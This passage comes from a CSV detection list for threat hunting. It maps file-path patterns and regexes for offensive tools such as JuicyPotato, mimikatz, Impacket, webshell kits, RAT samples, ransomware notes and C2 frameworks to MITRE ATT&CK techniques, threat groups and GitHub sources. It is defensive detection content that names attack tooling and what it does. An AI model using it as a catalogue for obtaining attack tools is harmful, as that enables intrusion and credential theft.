Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","15986" "*\Invoke-SocksProxy\*",".{0,1000}\\Invoke\-SocksProxy\\.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","15987" "*\Invoke-Stealth.ps1*",".{0,1000}\\Invoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful 
PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","15988" "*\InvokeWebRequestCommand.cs",".{0,1000}\\InvokeWebRequestCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15989" "*\Invoke-WMILM.ps1*",".{0,1000}\\Invoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15990" "*\InvokeWmiMethodCommand.cs",".{0,1000}\\InvokeWmiMethodCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15991" "*\iodine-*-windows.zip*",".{0,1000}\\iodine\-.{0,1000}\-windows\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","15998" "*\iodine.exe*",".{0,1000}\\iodine\.exe.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","15999" "*\iodine-master\*",".{0,1000}\\iodine\-master\\.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","16000" "*\IOXIDResolver.py*",".{0,1000}\\IOXIDResolver\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16001" "*\IPfuscation.cpp*",".{0,1000}\\IPfuscation\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","16002" "*\IPfuscation.exe*",".{0,1000}\\IPfuscation\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","16003" "*\IPPrintC2.ps1*",".{0,1000}\\IPPrintC2\.ps1.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - 
TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","16004" "*\Iraq RAT V.1.exe*",".{0,1000}\\Iraq\sRAT\sV\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16009" "*\ironvest\getCredsironvest.h*",".{0,1000}\\ironvest\\getCredsironvest\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16010" "*\irs.exe*",".{0,1000}\\irs\.exe.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","16011" "*\iscsicpl_bypassUAC*",".{0,1000}\\iscsicpl_bypassUAC.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense 
Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","16012" "*\itRAT.exe*",".{0,1000}\\itRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16020" "*\itsdangerous.zip*",".{0,1000}\\itsdangerous\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","16021" "*\itsecteam_shell.php*",".{0,1000}\\itsecteam_shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16022" "*\Ivy\Cryptor*",".{0,1000}\\Ivy\\Cryptor.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","16023" "*\Ivy\Loader\*",".{0,1000}\\Ivy\\Loader\\.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - 
T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","16024" "*\jaccdpqnvbrrxlaf*","\\jaccdpqnvbrrxlaf.{0,1000}","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","pipe names (sysmon EID 17 - 18)","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","16025" "*\jackdaw.exe",".{0,1000}\\jackdaw\.exe","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","16026" "*\jackdaw.zip",".{0,1000}\\jackdaw\.zip","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. 
store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","16027" "*\Jasmin Decryptor\*",".{0,1000}\\Jasmin\sDecryptor\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","16028" "*\Jasmin Decryptor\*",".{0,1000}\\Jasmin\sDecryptor\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","16029" "*\Jasmin Ransomware Final\*",".{0,1000}\\Jasmin\sRansomware\sFinal\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","16030" "*\jecretz.py*",".{0,1000}\\jecretz\.py.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira 
tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","0","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","16031" "*\Jeringa.exe*",".{0,1000}\\Jeringa\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16032" "*\Jordan RAT.exe*",".{0,1000}\\Jordan\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16033" "*\Jormungand.sln*",".{0,1000}\\Jormungand\.sln.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","16034" "*\jRAT v0.8d.exe*",".{0,1000}\\jRAT\sv0\.8d\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16037" 
"*\JuicyPotato.exe*",".{0,1000}\\JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16038" "*\JuicyPotato.pdb*",".{0,1000}\\JuicyPotato\.pdb.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16039" "*\JuicyPotato.pdb*",".{0,1000}\\JuicyPotato\.pdb.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#content","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16040" "*\JuicyPotato.pdb*",".{0,1000}\\JuicyPotato\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","JuicyPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16041" "*\JuicyPotato.pdb*",".{0,1000}\\JuicyPotato\.pdb.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated 
ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","16042" "*\JuicyPotato.x64.dll*",".{0,1000}\\JuicyPotato\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16043" "*\JuicyPotato.x86.dll*",".{0,1000}\\JuicyPotato\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16044" "*\JuicyPotato_x32.exe*",".{0,1000}\\JuicyPotato_x32\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - 
T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16045" "*\JuicyPotato_x64.exe*",".{0,1000}\\JuicyPotato_x64\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16046" "*\JuicyPotato-master*",".{0,1000}\\JuicyPotato\-master.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16047" "*\JuicyPotatoNG*",".{0,1000}\\JuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","16048" "*\JuicyPotato-shellcode\*",".{0,1000}\\JuicyPotato\-shellcode\\.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","16049" 
"*\Juicy-Potato-x86-master*",".{0,1000}\\Juicy\-Potato\-x86\-master.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","16050" "*\JunctionFolder.csproj*",".{0,1000}\\JunctionFolder\.csproj.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","16051" "*\JX34qQm7.txt*",".{0,1000}\\JX34qQm7\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16055" "*\ka0tic.pl*",".{0,1000}\\ka0tic\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16056" "*\KAdot Universal Shell v0.1.6.php*",".{0,1000}\\KAdot\sUniversal\sShell\sv0\.1\.6\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 
- TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16057" "*\kali-install.sh*",".{0,1000}\\kali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","16058" "*\kali-linux-2023*",".{0,1000}\\kali\-linux\-2023.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","16059" "*\KARMA-ENCRYPTED.txt*",".{0,1000}\\KARMA\-ENCRYPTED\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16060" "*\karmaSMB.exe*",".{0,1000}\\karmaSMB\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16061" "*\karmaSMB.py*",".{0,1000}\\karmaSMB\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16062" "*\kaspersky\getCredsKasperskyEntries.h*",".{0,1000}\\kaspersky\\getCredsKasperskyEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16064" "*\KAssembly.x64.o*",".{0,1000}\\KAssembly\.x64\.o.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","16065" "*\katz.ps1*",".{0,1000}\\katz\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz powershell alternative name","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - 
